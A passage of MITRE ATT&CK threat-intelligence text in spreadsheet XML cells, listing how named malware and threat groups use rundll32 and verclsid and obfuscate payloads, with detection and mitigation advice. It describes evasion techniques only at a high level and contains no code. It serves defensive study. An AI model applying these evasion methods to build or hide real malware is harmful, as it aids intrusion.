[RTM](https://attack.mitre.org/software/S0148) runs its core DLL file using rundll32.exe.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)
Ragnar Locker
[Ragnar Locker](https://attack.mitre.org/software/S0481) has used rundll32.exe to execute components of VirtualBox.(Citation: Sophos Ragnar May 2020)
SDBbot
[SDBbot](https://attack.mitre.org/software/S0461) has used rundll32.exe to execute DLLs.(Citation: Korean FSI TA505 2020)
SUNBURST
[SUNBURST](https://attack.mitre.org/software/S0559) used Rundll32 to execute payloads.(Citation: Microsoft Deep Dive Solorigate January 2021) 
SVCReady
[SVCReady](https://attack.mitre.org/software/S1064) has used `rundll32.exe` for execution.(Citation: HP SVCReady Jun 2022)
Sakula
[Sakula](https://attack.mitre.org/software/S0074) calls cmd.exe to run various DLL files via rundll32.(Citation: Dell Sakula)
ServHelper
[ServHelper](https://attack.mitre.org/software/S0382) contains a module for downloading and executing DLLs that leverages &lt;code&gt;rundll32.exe&lt;/code&gt;.(Citation: Deep Instinct TA505 Apr 2019)
Sibot
[Sibot](https://attack.mitre.org/software/S0589) has executed downloaded DLLs with &lt;code&gt;rundll32.exe&lt;/code&gt;.(Citation: MSTIC NOBELIUM Mar 2021)
Squirrelwaffle
[Squirrelwaffle](https://attack.mitre.org/software/S1030) has been executed using `rundll32.exe`.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)
StreamEx
[StreamEx](https://attack.mitre.org/software/S0142) uses rundll32 to call an exported function.(Citation: Cylance Shell Crew Feb 2017)
USBferry
[USBferry](https://attack.mitre.org/software/S0452) can execute rundll32.exe in memory to avoid detection.(Citation: TrendMicro Tropic Trooper May 2020)	
Winnti for Windows
The [Winnti for Windows](https://attack.mitre.org/software/S0141) installer loads a DLL using rundll32.(Citation: Microsoft Winnti Jan 2017)(Citation: Novetta Winnti April 2015)
ZxShell
[ZxShell](https://attack.mitre.org/software/S0412) has used rundll32.exe to execute other DLLs and named pipes.(Citation: Talos ZxShell Oct 2014) 
gh0st RAT
A [gh0st RAT](https://attack.mitre.org/software/S0032) variant has used rundll32 for execution.(Citation: Arbor Musical Chairs Feb 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">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Credential Access Protection
Some embedded network devices are capable of storing passwords for local accounts in either plain-text or encrypted formats.  Ensure that, where available, local passwords are always encrypted, per vendor recommendations. (Citation: Cisco IOS Software Integrity Assurance - AAA)
Filter Network Traffic
Block Traffic	Upon identifying a compromised network device being used to bridge a network boundary, block the malicious packets using an unaffected network device in path, such as a firewall or a router that has not been compromised.  Continue to monitor for additional activity and to ensure that the blocks are indeed effective.
Multi-factor Authentication
Use multi-factor authentication for user and privileged accounts. Most embedded network devices support TACACS+ and/or RADIUS.  Follow vendor prescribed best practices for hardening access control. (Citation: Cisco IOS Software Integrity Assurance - TACACS)
Password Policies
Refer to NIST guidelines when creating password policies. (Citation: NIST 800-63-3)
Privileged Account Management
Restrict administrator accounts to as few individuals as possible, following least privilege principles.  Prevent credential overlap across systems of administrator and privileged accounts, particularly between network and non-network platforms, such as servers or endpoints.
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Command arguments used before and after the invocation of verclsid.exe may also be useful in determining the origin and purpose of the payload being executed.
Process Creation
Use process monitoring to monitor the execution and arguments of verclsid.exe. Compare recent invocations of verclsid.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Depending on the environment, it may be unusual for verclsid.exe to have a parent process of a Microsoft Office product. It may also be unusual for verclsid.exe to have any child processes or to make network connections or file modifications.
Disable or Remove Feature or Program
Consider removing verclsid.exe if it is not necessary within a given environment.
Execution Prevention
Use application control configured to block execution of verclsid.exe if it is not required for a given system or network to prevent potential misuse by adversaries.
Filter Network Traffic
Consider modifying host firewall rules to prevent egress traffic from verclsid.exe.
Hancitor
[Hancitor](https://attack.mitre.org/software/S0499) has used verclsid.exe to download and execute a malicious script.(Citation: Red Canary Verclsid.exe)
</t>
  </si>
  <si>
    <t>Command Execution
Monitor executed commands and arguments for indicators of obfuscation and potentially suspicious syntax such as uninterpreted escape characters (e.g., `^`).
Also monitor command-lines for syntax-specific signs of obfuscation, such as variations of arguments associated with encoding.
File Creation
Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).
File Metadata
Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.
File-based signatures may be capable of detecting code obfuscation depending on the methods used.(Citation: Huntress API Hash)(Citation: BlackHat API Packers)(Citation: MITRECND FindAPIHash)
Module Load
Monitoring module loads, especially those not explicitly included in import tables, may highlight obfuscated code functionality. Dynamic malware analysis may also expose signs of code obfuscation.(Citation: BlackHat API Packers)
OS API Execution
Monitor and analyze calls to functions such as  `GetProcAddress()` that are associated with malicious code obfuscation.(Citation: Huntress API Hash)
Process Creation
Monitor for newly executed processes that may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
Script Execution
Monitor executed scripts for indicators of obfuscation and potentially suspicious command syntax, such as uninterpreted escape characters (e.g., `^`).
Also monitor commands within scripts for syntax-specific signs of obfuscation, such as encoded or otherwise unreadable blobs of characters.
WMI Creation
Monitor for the creation of WMI Objects and values that may highlight storage of malicious data such as commands or payloads.
Windows Registry Key Creation
Monitor for the creation of Registry values that may highlight storage of malicious data such as commands or payloads.
Antivirus/Antimalware
Anti-virus can be used to automatically detect and quarantine suspicious files. Consider utilizing the Antimalware Scan Interface (AMSI) on Windows 10+ to analyze commands after being processed/interpreted. (Citation: Microsoft AMSI June 2015)
Audit
Consider periodic review of common fileless storage locations (such as the Registry or WMI repository) to potentially identify abnormal and malicious data.
Behavior Prevention on Endpoint
On Windows 10+, enable Attack Surface Reduction (ASR) rules to prevent execution of potentially obfuscated payloads. (Citation: win10_asr)
User Training
Ensure that a finite amount of ingress points to a software deployment system exist with restricted access for those required to allow and enable newly deployed software.
2016 Ukraine Electric Power Attack
During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used heavily obfuscated code with [Industroyer](https://attack.mitre.org/software/S0604) in its Windows Notepad backdoor.(Citation: ESET Industroyer)
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used Base64-encoded strings.(Citation: DFIR Conti Bazar Nov 2021)
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) broke malicious binaries, including [DEADEYE](https://attack.mitre.org/software/S1052) and [KEYPLUG](https://attack.mitre.org/software/S1051), into multiple sections on disk to evade detection.(Citation: Mandiant APT41)
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used a DLL that included an XOR-encoded section.(Citation: McAfee Night Dragon)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) encrypted malware such as  [DRATzarus](https://attack.mitre.org/software/S0694) with XOR and DLL files with base64.(Citation: ClearSky Lazarus Aug 2020)(Citation: ESET Lazarus Jun 2020)(Citation: McAfee Lazarus Jul 2020)(Citation: McAfee Lazarus Nov 2020)
Operation Dust Storm
During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors encoded some payloads with a single-byte XOR, both skipping the key itself and zeroing in an attempt to avoid exposing the key; other payloads were Base64-encoded.(Citation: Cylance Dust Storm)
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used Base64 to encode files with a custom key.(Citation: McAfee Honeybee)
Operation Spalax
For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used XOR-encrypted payloads.(Citation: ESET Operation Spalax Jan 2021)
APT-C-36
[APT-C-36](https://attack.mitre.org/groups/G0099) has used ConfuserEx to obfuscate its variant of [Imminent Monitor](https://attack.mitre.org/software/S0434), compressed payload and RAT packages, and password protected encrypted email attachments to avoid detection.(Citation: QiAnXin APT-C-36 Feb2019)
APT18
[APT18](https://attack.mitre.org/groups/G0026) obfuscates strings in the payload.(Citation: PaloAlto DNS Requests May 2016)
APT19
[APT19](https://attack.mitre.org/groups/G0073) used Base64 to obfuscate payloads.(Citation: FireEye APT19)
APT28
[APT28](https://attack.mitre.org/groups/G0007) encrypted a .dll payload using RTL and a custom encryption algorithm. [APT28](https://attack.mitre.org/groups/G0007) has also obfuscated payloads with base64, XOR, and RC4.(Citation: Bitdefender APT28 Dec 2015)(Citation: Unit 42 Sofacy Feb 2018)(Citation: Palo Alto Sofacy 06-2018)(Citation: Talos Seduploader Oct 2017)(Citation: Accenture SNAKEMACKEREL Nov 2018)
APT3
[APT3](https://attack.mitre.org/groups/G0022) obfuscates files or information to help evade defensive measures.(Citation: Symantec Buckeye)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has performed code obfuscation, including encoding payloads using Base64 and using a framework called "Dont-Kill-My-Cat (DKMC). [APT32](https://attack.mitre.org/groups/G0050) also encrypts the library used for network exfiltration with AES-256 in CBC mode in their macOS backdoor.(Citation: FireEye APT32 May 2017)(Citation: GitHub Invoke-Obfuscation)(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: ESET OceanLotus macOS April 2019)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has used base64 to encode payloads.(Citation: FireEye APT33 Guardrail)
APT37
[APT37](https://attack.mitre.org/groups/G0067) obfuscates strings and payloads.(Citation: Talos Group123)(Citation: Securelist ScarCruft May 2019)(Citation: Volexity InkySquid RokRAT August 2021)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used malware to drop encrypted CAB files.(Citation: FBI FLASH APT39 September 2020)
APT41
[APT41](https://attack.mitre.org/groups/G0096) used VMProtected binaries in multiple intrusions.(Citation: FireEye APT41 March 2020)
BITTER
[BITTER](https://attack.mitre.org/groups/G1002) has used a RAR SFX dropper to deliver malware.(Citation: Forcepoint BITTER Pakistan Oct 2016)
BackdoorDiplomacy
[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has obfuscated tools and malware it uses with VMProtect.(Citation: ESET BackdoorDiplomacy Jun 2021)
BlackOasis
[BlackOasis](https://attack.mitre.org/groups/G0063)'s first stage shellcode contains a NOP sled with alternative instructions that was likely designed to bypass antivirus tools.(Citation: Securelist BlackOasis Oct 2017)
Blue Mockingbird
[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has obfuscated the wallet address in the payload binary.(Citation: RedCanary Mockingbird May 2020)
Dark Caracal
[Dark Caracal](https://attack.mitre.org/groups/G0070) has obfuscated strings in [Bandook](https://attack.mitre.org/software/S0234) by base64 encoding, and then encrypting them.(Citation: Lookout Dark Caracal Jan 2018)
Darkhotel
[Darkhotel](https://attack.mitre.org/groups/G0012) has obfuscated code using RC4, XOR, and RSA.(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft DUBNIUM July 2016)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) used Base64 to encode strings.(Citation: TrendMicro EarthLusca 2022)
Elderwood
[Elderwood](https://attack.mitre.org/groups/G0066) has encrypted documents and malicious executables.(Citation: Symantec Elderwood Sept 2012)
Ember Bear
[Ember Bear](https://attack.mitre.org/groups/G1003) has obfuscated malware to help avoid detection.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has base64 encoded payloads to avoid detection.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) used a modified version of [HTRAN](https://attack.mitre.org/software/S0040) in which they obfuscated strings such as debug messages in an apparent attempt to evade detection.(Citation: Cybereason Soft Cell June 2019)
Gallmaker
[Gallmaker](https://attack.mitre.org/groups/G0084) obfuscated shellcode used during execution.(Citation: Symantec Gallmaker Oct 2018)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has delivered self-extracting 7z archive files within malicious document attachments.(Citation: ESET Gamaredon June 2020)
Group5
[Group5](https://attack.mitre.org/groups/G0043) disguised its malicious binaries with several layers of obfuscation, including encrypting the files.(Citation: Citizen Lab Group5)
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126) used Base64 encoded compressed payloads.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)
Inception
[Inception](https://attack.mitre.org/groups/G0100) has encrypted malware payloads dropped on victim machines with AES and RC4 encryption.(Citation: Kaspersky Cloud Atlas December 2014)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has used Base64-encoded shellcode strings.(Citation: Microsoft NICKEL December 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has obfuscated binary strings including the use of XOR encryption and Base64 encoding.(Citation: ThreatConnect Kimsuky September 2020)(Citation: VirusBulletin Kimsuky October 2019) [Kimsuky](https://attack.mitre.org/groups/G0094) has also modified the first byte of DLL implants targeting victims to prevent recognition of the executable file format.(Citation: Talos Kimsuky Nov 2021)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has used multiple types of encryption and encoding for their payloads, including AES, Caracachs, RC4, XOR, Base64, and other tricks such as creating aliases in code for [Native API](https://attack.mitre.org/techniques/T1106) function names.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster RATs)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: TrendMicro macOS Dacls May 2020)(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has obfuscated code using base64 and gzip compression.(Citation: Proofpoint Leviathan Oct 2017)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) malware has used base64-encoded files and has also encrypted embedded strings with AES.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: Microsoft Iranian Threat Actor Trends November 2021)
Metador
[Metador](https://attack.mitre.org/groups/G1013) has encrypted their payloads.(Citation: SentinelLabs Metador Sept 2022)
Mofang
[Mofang](https://attack.mitre.org/groups/G0103) has compressed the [ShimRat](https://attack.mitre.org/software/S0444) executable within malicious email attachments. [Mofang](https://attack.mitre.org/groups/G0103) has also encrypted payloads before they are downloaded to victims.(Citation: FOX-IT May 2016 Mofang)
Molerats
[Molerats](https://attack.mitre.org/groups/G0021) has delivered compressed executables within ZIP files to victims.(Citation: Kaspersky MoleRATs April 2019)
Moses Staff
[Moses Staff](https://attack.mitre.org/groups/G1009) has used obfuscated web shells in their operations.(Citation: Checkpoint MosesStaff Nov 2021)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has delivered initial payloads hidden using archives and encoding measures.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Recorded Future REDDELTA July 2020)(Citation: Proofpoint TA416 November 2020)(Citation: Proofpoint TA416 Europe March 2022)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has encrypted and encoded data in its malware, including by using base64.(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)(Citation: Unit42 OilRig Playbook 2023)(Citation: Crowdstrike Helix Kitten Nov 2018)(Citation: Unit42 OilRig Nov 2018)
Putter Panda
Droppers used by [Putter Panda](https://attack.mitre.org/groups/G0024) use RC4 or a 16-byte XOR key consisting of the bytes 0xA0 – 0xAF to obfuscate payloads.(Citation: CrowdStrike Putter Panda)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) has modified UPX headers after packing files to break unpackers.(Citation: Anomali Rocke March 2019)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has used Base64 encoding within malware variants.(Citation: iSight Sandworm Oct 2014)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has used base64 encoding and ECDH-P256 encryption for payloads.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder APT April 2020)(Citation: Cyble Sidewinder September 2020)
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has used compressed and char-encoded scripts in operations.(Citation: Cisco Operation Layover September 2021)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has password-protected malicious Word documents.(Citation: Proofpoint TA505 Sep 2017)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has encrypted its binaries via AES and encoded files using Base64.(Citation: Trend Micro TeamTNT)(Citation: Aqua TeamTNT August 2020)
Threat Group-3390
A [Threat Group-3390](https://attack.mitre.org/groups/G0027) tool can encrypt payloads using XOR. [Threat Group-3390](https://attack.mitre.org/groups/G0027) malware is also obfuscated using Metasploit’s shikata_ga_nai encoder as well as compressed with LZNT1 compression.(Citation: Nccgroup Emissary Panda May 2018)(Citation: Securelist LuckyMouse June 2018)(Citation: Unit42 Emissary Panda May 2019)
Transparent Tribe
[Transparent Tribe](https://attack.mitre.org/groups/G0134) has dropped encoded executables on compromised hosts.(Citation: Proofpoint Operation Transparent Tribe March 2016)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has encrypted configuration files.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: TrendMicro Tropic Trooper May 2020)
Whitefly
[Whitefly](https://attack.mitre.org/groups/G0107) has encrypted the payload used for C2.(Citation: Symantec Whitefly March 2019)	
Windshift
[Windshift](https://attack.mitre.org/groups/G0112) has used string encoding with floating point calculations.(Citation: BlackBerry Bahamut)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has encoded strings in its malware with base64 as well as with a simple, single-byte XOR obfuscation using key 0x40.(Citation: Accenture Hogfish April 2018)(Citation: FireEye APT10 Sept 2018)(Citation: Symantec Cicada November 2020)
ADVSTORESHELL
Most of the strings in [ADVSTORESHELL](https://attack.mitre.org/software/S0045) are encrypted with an XOR-based algorithm; some strings are also encrypted with 3DES and reversed. API function names are also reversed, presumably to avoid detection in memory.(Citation: Kaspersky Sofacy)(Citation: Bitdefender APT28 Dec 2015)
Action RAT
 [Action RAT](https://attack.mitre.org/software/S1028)'s commands, strings, and domains can be Base64 encoded within the payload.(Citation: MalwareBytes SideCopy Dec 2021)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) has had its code obfuscated in an apparent attempt to make analysis difficult.(Citation: Fortinet Agent Tesla April 2018) [Agent Tesla](https://attack.mitre.org/software/S0331) has used the Rijndael symmetric encryption algorithm to encrypt strings.(Citation: Malwarebytes Agent Tesla April 2020)
Amadey
[Amadey](https://attack.mitre.org/software/S1025) has obfuscated strings such as antivirus vendor names, domains, files, and others.(Citation: BlackBerry Amadey 2020)
Anchor
[Anchor](https://attack.mitre.org/software/S0504) has obfuscated code with stack strings and string encryption.(Citation: Cyberreason Anchor December 2019)
AppleJeus
[AppleJeus](https://attack.mitre.org/software/S0584) has XOR-encrypted collected system information prior to sending to a C2. [AppleJeus](https://attack.mitre.org/software/S0584) has also used the open source ADVObfuscation library for its components.(Citation: CISA AppleJeus Feb 2021)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) has the ability to Base64 encode its payload and custom encrypt API calls.(Citation: Malwarebytes Kimsuky June 2021)
Aria-body
[Aria-body](https://attack.mitre.org/software/S0456) has used an encrypted configuration file for its loader.(Citation: CheckPoint Naikon May 2020)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) has used an XOR-based algorithm to encrypt payloads twice with different keys.(Citation: Securelist Brazilian Banking Malware July 2020)
Attor
Strings in [Attor](https://attack.mitre.org/software/S0438)'s components are encrypted with a XOR cipher, using a hardcoded key and the configuration data, log files and plugins are encrypted using a hybrid encryption scheme of Blowfish-OFB combined with RSA.(Citation: ESET Attor Oct 2019)
AuditCred
[AuditCred](https://attack.mitre.org/software/S0347) encrypts the configuration.(Citation: TrendMicro Lazarus Nov 2018)
Avaddon
[Avaddon](https://attack.mitre.org/software/S0640) has used encrypted strings.(Citation: Arxiv Avaddon Feb 2021)
Avenger
[Avenger](https://attack.mitre.org/software/S0473) has the ability to XOR encrypt files to be sent to C2.(Citation: Trend Micro Tick November 2019)
AvosLocker
[AvosLocker](https://attack.mitre.org/software/S1053) has used XOR-encoded strings.(Citation: Malwarebytes AvosLocker Jul 2021)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can be compressed with the ApLib algorithm.(Citation: BitDefender BADHATCH Mar 2021)
BLINDINGCAN
[BLINDINGCAN](https://attack.mitre.org/software/S0520) has obfuscated code using Base64 encoding.(Citation: US-CERT BLINDINGCAN Aug 2020)
BLUELIGHT
[BLUELIGHT](https://attack.mitre.org/software/S0657) has a XOR-encoded payload.(Citation: Volexity InkySquid BLUELIGHT August 2021)
BOOSTWRITE
[BOOSTWRITE](https://attack.mitre.org/software/S0415) has encoded its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit Initialization vector (IV) to evade detection.(Citation: FireEye FIN7 Oct 2019)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) has used XOR, RSA2, and RC4 encrypted files.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)(Citation: CrowdStrike Wizard Spider October 2020)
BendyBear
[BendyBear](https://attack.mitre.org/software/S0574) has encrypted payloads using RC4 and XOR.(Citation: Unit42 BendyBear Feb 2021)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268)'s DLL file and non-malicious decoy file are encrypted with RC4 and some function name strings are obfuscated.(Citation: Unit 42 Bisonal July 2018)(Citation: Talos Bisonal Mar 2020)
BitPaymer
[BitPaymer](https://attack.mitre.org/software/S0570) has used RC4-encrypted strings and string hashes to avoid identifiable strings within the binary.(Citation: Crowdstrike Indrik November 2018)
BoomBox
[BoomBox](https://attack.mitre.org/software/S0635) can encrypt data using AES prior to exfiltration.(Citation: MSTIC Nobelium Toolset May 2021)
BoxCaon
[BoxCaon](https://attack.mitre.org/software/S0651) used the "StackStrings" obfuscation technique to hide malicious functionalities.(Citation: Checkpoint IndigoZebra July 2021)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) has used encrypted payload files and maintains an encrypted configuration structure in memory.(Citation: Palo Alto Brute Ratel July 2022)(Citation: MDSec Brute Ratel August 2022)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) has been delivered as password-protected zipped ISO files and used control-flow-flattening to obfuscate the flow of functions.(Citation: Proofpoint Bumblebee April 2022)(Citation: Cybereason Bumblebee August 2022)(Citation: Medium Ali Salem Bumblebee April 2022)
Bundlore
[Bundlore](https://attack.mitre.org/software/S0482) has obfuscated data with base64, AES, RC4, and bz2.(Citation: MacKeeper Bundlore Apr 2019)
CARROTBALL
[CARROTBALL](https://attack.mitre.org/software/S0465) has used a custom base64 alphabet to decode files.(Citation: Unit 42 CARROTBAT January 2020)
CARROTBAT
[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to download a base64 encoded payload.(Citation: Unit 42 CARROTBAT November 2018)
CORESHELL
[CORESHELL](https://attack.mitre.org/software/S0137) obfuscates strings using a custom stream cipher.(Citation: FireEye APT28)
Carbanak
[Carbanak](https://attack.mitre.org/software/S0030) encrypts strings to make analysis more difficult.(Citation: FireEye CARBANAK June 2017)
Carberp
[Carberp](https://attack.mitre.org/software/S0484) has used XOR-based encryption to mask C2 server locations within the trojan.(Citation: Prevx Carberp March 2011)
Carbon
[Carbon](https://attack.mitre.org/software/S0335) encrypts configuration files and tasks for the malware to complete using CAST-128 algorithm.(Citation: ESET Carbon Mar 2017)(Citation: Accenture HyperStack October 2020)
Cardinal RAT
[Cardinal RAT](https://attack.mitre.org/software/S0348) encodes many of its artifacts and is encrypted (AES-128) when downloaded.(Citation: PaloAlto CardinalRat Apr 2017) 
Chinoxy
[Chinoxy](https://attack.mitre.org/software/S1041) has encrypted its configuration file.(Citation: Bitdefender FunnyDream Campaign November 2020)
Chrommme
[Chrommme](https://attack.mitre.org/software/S0667) can encrypt sections of its code to evade detection.(Citation: ESET Gelsemium June 2021)
Clambling
The [Clambling](https://attack.mitre.org/software/S0660) executable has been obfuscated when dropped on a compromised host.(Citation: Trend Micro DRBControl February 2020)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can hash functions to obfuscate calls to the Windows API and use a public/private key pair to encrypt Beacon session metadata.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)
CoinTicker
[CoinTicker](https://attack.mitre.org/software/S0369) initially downloads a hidden encoded file.(Citation: CoinTicker 2019)
ComRAT
[ComRAT](https://attack.mitre.org/software/S0126) has encrypted its virtual file system using AES-256 in XTS mode.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020) 
Comnie
[Comnie](https://attack.mitre.org/software/S0244) uses RC4 and Base64 to obfuscate strings.(Citation: Palo Alto Comnie)
Conficker
[Conficker](https://attack.mitre.org/software/S0608) has obfuscated its code to prevent its removal from host machines.(Citation: Trend Micro Conficker)
Conti
[Conti](https://attack.mitre.org/software/S0575) can use compiler-based obfuscation for its code, encrypt DLLs, and hide Windows API calls.(Citation: CarbonBlack Conti July 2020)(Citation: Cybereason Conti Jan 2021)(Citation: CrowdStrike Wizard Spider October 2020)
CozyCar
The payload of [CozyCar](https://attack.mitre.org/software/S0046) is encrypted with simple XOR with a rotating key. The [CozyCar](https://attack.mitre.org/software/S0046) configuration file has been encrypted with RC4 keys.(Citation: F-Secure CozyDuke)
Cuba
[Cuba](https://attack.mitre.org/software/S0625) has used multiple layers of obfuscation to avoid analysis, including its Base64 encoded payload.(Citation: McAfee Cuba April 2021) 
DCSrv
[DCSrv](https://attack.mitre.org/software/S1033)'s configuration is encrypted.(Citation: Checkpoint MosesStaff Nov 2021)
DEADEYE
[DEADEYE](https://attack.mitre.org/software/S1052) has encrypted its payload.(Citation: Mandiant APT41)
DOGCALL
[DOGCALL](https://attack.mitre.org/software/S0213) is encrypted using single-byte XOR.(Citation: Unit 42 Nokki Oct 2018)
DRATzarus
[DRATzarus](https://attack.mitre.org/software/S0694) can be partly encrypted with XOR.(Citation: ClearSky Lazarus Aug 2020)
Dacls
[Dacls](https://attack.mitre.org/software/S0497) can encrypt its configuration file with AES CBC.(Citation: TrendMicro macOS Dacls May 2020)
DanBot
[DanBot](https://attack.mitre.org/software/S1014) can Base64 encode its payload.(Citation: SecureWorks August 2019)
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066) has been obfuscated with the DeepSea .NET and ConfuserEx code obfuscators.(Citation: Secureworks DarkTortilla Aug 2022)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) has been delivered as compressed RAR payloads in ZIP files to victims.(Citation: Prevailion DarkWatchman 2021)
Daserf
[Daserf](https://attack.mitre.org/software/S0187) uses encrypted Windows APIs and also encrypts data using the alternative base64+RC4 or the Caesar cipher.(Citation: Trend Micro Daserf Nov 2017)
Denis
[Denis](https://attack.mitre.org/software/S0354) obfuscates its code and encrypts the API names.(Citation: Cybereason Cobalt Kitty 2017)
Diavol
[Diavol](https://attack.mitre.org/software/S0659) has Base64 encoded the RSA public key used for encrypting files.(Citation: Fortinet Diavol July 2021)
Donut
[Donut](https://attack.mitre.org/software/S0695) can generate encrypted, compressed/encoded, or otherwise obfuscated code modules.(Citation: Donut Github)
Dridex
[Dridex](https://attack.mitre.org/software/S0384)'s strings are obfuscated using RC4.(Citation: Checkpoint Dridex Jan 2021) 
Drovorub
[Drovorub](https://attack.mitre.org/software/S0502) has used XOR encrypted payloads in WebSocket client to server messages.(Citation: NSA/FBI Drovorub August 2020)
DustySky
The [DustySky](https://attack.mitre.org/software/S0062) dropper uses a function to obfuscate the name of functions and other parts of the malware.(Citation: DustySky)
ECCENTRICBANDWAGON
[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) has encrypted strings with RC4.(Citation: CISA EB Aug 2020)
EKANS
[EKANS](https://attack.mitre.org/software/S0605) uses encoded strings in its process kill list.(Citation: FireEye Ransomware Feb 2020) 
Ebury
[Ebury](https://attack.mitre.org/software/S0377) has obfuscated its strings with a simple XOR encryption with a static key.(Citation: ESET Ebury Feb 2014)
Ecipekac
[Ecipekac](https://attack.mitre.org/software/S0624) can use XOR, AES, and DES to encrypt loader shellcode.(Citation: Securelist APT10 March 2021)
Elise
[Elise](https://attack.mitre.org/software/S0081) encrypts several of its files, including configuration files.(Citation: Lotus Blossom Jun 2015)
Emissary
Variants of [Emissary](https://attack.mitre.org/software/S0082) encrypt payloads using various XOR ciphers, as well as a custom algorithm that uses the "srand" and "rand" functions.(Citation: Lotus Blossom Dec 2015)(Citation: Emissary Trojan Feb 2016)
EnvyScout
[EnvyScout](https://attack.mitre.org/software/S0634) can Base64 encode payloads.(Citation: MSTIC Nobelium Toolset May 2021)
Epic
[Epic](https://attack.mitre.org/software/S0091) heavily obfuscates its code to make analysis more difficult.(Citation: Kaspersky Turla)
Exaramel for Linux
[Exaramel for Linux](https://attack.mitre.org/software/S0401) uses RC4 for encrypting the configuration.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)
FELIXROOT
[FELIXROOT](https://attack.mitre.org/software/S0267) encrypts strings in the backdoor using a custom XOR algorithm.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)
FIVEHANDS
The [FIVEHANDS](https://attack.mitre.org/software/S0618) payload is encrypted with AES-128.(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)(Citation: NCC Group Fivehands June 2021)
FatDuke
